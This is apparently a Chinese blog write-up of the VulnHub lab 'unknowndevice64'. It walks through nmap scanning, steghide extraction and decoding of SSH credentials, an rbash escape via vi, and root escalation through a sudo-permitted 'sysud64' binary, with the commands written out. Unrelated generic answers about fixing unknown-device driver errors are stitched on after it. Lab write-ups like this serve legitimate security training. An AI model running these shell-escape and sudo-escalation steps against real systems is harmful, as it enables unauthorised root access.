unknowndevice64 v2.0靶场复现【附代码】(权限提升)

靶机下载地址:

https://www.vulnhub.com/entry/unknowndevice64-1,293/icon-default.png?t=N7T8https://www.vulnhub.com/entry/unknowndevice64-1,293/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:BE:E8:F6'

1.2. 端口扫描

nmap 192.168.7.92 -p- -A

1.3. 目录扫描

dirb http://192.168.7.92:31337

1.4. 敏感信息获取

whatweb http://192.168.7.92:31337

2. WEB打点寻找可利用功能点

2.1. 进入http端口【u1s1这是我见过最新颖的一个靶机页面了】

1.老规矩,逐个点击功能点,测试可利用的功能点 ->暂无 -> 右击查看网页源代码,出现提示让我们去拼接

/key_is_h1dd3n.jpg

2.拼接/key_is_h1dd3n.jpg,右击图片另保存至本地;

3.在kali中使用 steghide 工具提取信息,需要密码,但是图片的文件名称可能为密码,试了几次确实是【h1dd3n】

***pass:如果你也像我没安装或者安装时出现问题,先更新以下驱动的库再试试安装steghide***

sudo apt update
apt-get install steghide

4.尝试解析密码【h1dd3n】

steghide extract -sf key_is_h1dd3n.jpg

打开看看,熟悉的Brainfuck加密

cat h1dd3n.txt

利用BerylEnigma工具解密 -> 得到账号密码【ud64:1M!#64@ud】

2.2. SSH连接+GetShell

连接ssh

ssh ud64@192.168.7.92 -p 1337
# 密码:1M!#64@ud

3. 权限提升

1.老规矩,查看当前用户的命令权限 -> 方式被禁用了

sudo -l

2.是rbash的shell -> 双击tab键,查看可执行命令

3.发现vi 和 export 命令可用,尝试vi 绕过,还是有部分命令无法执行

vi
shift+‘冒号’
!/bin/bash

4.配置环境变量

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

sysud64 可以执行 root 权限的命令,直接尝试提权,但是失败了

sysud64 -h 查看帮助,发现可以使用-o参数

sysud64 -h

尝试提权

sudo sysud64 -o /dev/null /bin/bash

  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
### 回答1: Unknown Device是指电脑在设备管理器中无法识别的未知设备。修复方法有以下几种: 1. 更新驱动程序:右键点击未知设备,选择“更新驱动程序”,尝试使用Windows更新或手动下载并安装适用于该设备的驱动程序。 2. 卸载并重新安装设备:右键点击未知设备,选择“卸载设备”,然后重启电脑。重新插入设备后,电脑将重新识别设备并尝试重新安装驱动程序。 3. 使用设备厂商提供的驱动程序:从设备的官方网站下载并安装针对该设备的最新驱动程序。 4. 检查硬件连接:检查设备和电脑之间的连接是否正常,尝试更换电源线、USB线或其他连接线。 5. 检查设备是否损坏:尝试将设备连接到另一台电脑或设备上,如果该设备仍然无法被识别,可能是设备自身出现故障。 总之,无论哪种方法,都需要仔细分析并一步一步进行试验,以确定最终解决方案。求助专业技术人员可能会更快地解决问题。 ### 回答2: 修复"unknowndevice"的方法取决于具体情况。根据问题的描述,可能是指电脑或移动设备无法识别或识别不出某个设备的错误。 首先,我们可以尝试以下方法来修复这个问题: 1. 重新连接设备:断开设备连接并重新连接,确保连接线是否牢固连接,并将其插入正确的端口或插槽。 2. 重启设备:有时,设备或计算机的重启可以解决无法识别设备的问题。尝试重启设备并查看是否可以解决问题。 3. 更新驱动程序:在设备管理器中查找问题设备,右键点击它并选择"更新驱动程序"。如果有可用的更新,请下载并安装它们,然后重新连接设备。 4. 更新操作系统:确保你的操作系统是最新的版本。更新操作系统可能会修复某些设备不被识别的问题。 5. 使用其他USB端口或电缆:有时,设备无法被识别可能是由于破损的USB端口或电缆引起的。尝试使用不同的USB端口或更换电缆来确认问题所在。 如果以上方法都无效,可能需要采取以下额外措施: 1. 参考设备或计算机的说明手册:查看设备或计算机的手册,以了解更多关于如何识别和连接特定设备的信息。 2. 参考设备制造商的网站:访问设备制造商的官方网站,查找关于修复特定设备的文档、驱动程序或其他支持信息。 3. 寻求专业帮助:如果问题仍然存在,可能需要寻求专业技术支持的帮助。联系设备制造商、计算机技术支持专家或维修中心以获取更多指导。 总之,修复"unknowndevice"的关键是找出具体的原因,并采取相应的措施进行修复。根据具体设备和情况,可能需要尝试多种方法来解决问题。 ### 回答3: 修复 "unknowndevice" 的具体步骤会根据问题的性质和出现该问题的具体设备而有所不同。这是由于 "unknowndevice" 是一个比较宽泛的错误描述,可指示许多不同类型的问题。以下是一些可能的修复步骤: 1. 驱动程序更新:首先,尝试更新相关设备的驱动程序。可以通过设备管理器或设备官方网站下载和安装最新的驱动程序版本。如果驱动程序过时或损坏,可能会导致设备被识别为 "unknowndevice"。 2. 连接检查:检查设备与计算机之间的所有连接,并确保它们正确插入。有些 "unknowndevice" 错误可能是由于不良或不稳定的连接导致的。 3. 重新启动设备和计算机:有时,重新启动设备和计算机可以解决 "unknowndevice" 错误。关闭设备并从电源中断供电,然后重新启动计算机。然后再次连接设备并检查错误是否已解决。 4. 执行设备故障排除:某些操作系统中都有设备故障排除工具,可以帮助识别和修复设备问题。尝试按照操作系统故障排除流程的指导进行检查。 5. 重新安装设备:如果上述方法都无效,可以考虑卸载设备,并重新安装。这可以通过设备管理器中的 "卸载设备" 选项来完成。然后再次连接设备,系统将自动重新安装该设备。 总之,修复 "unknowndevice" 错误需要根据具体情况采取相应的措施。如果问题仍然存在,可能需要咨询专业技术人员或设备制造商以获取更多帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值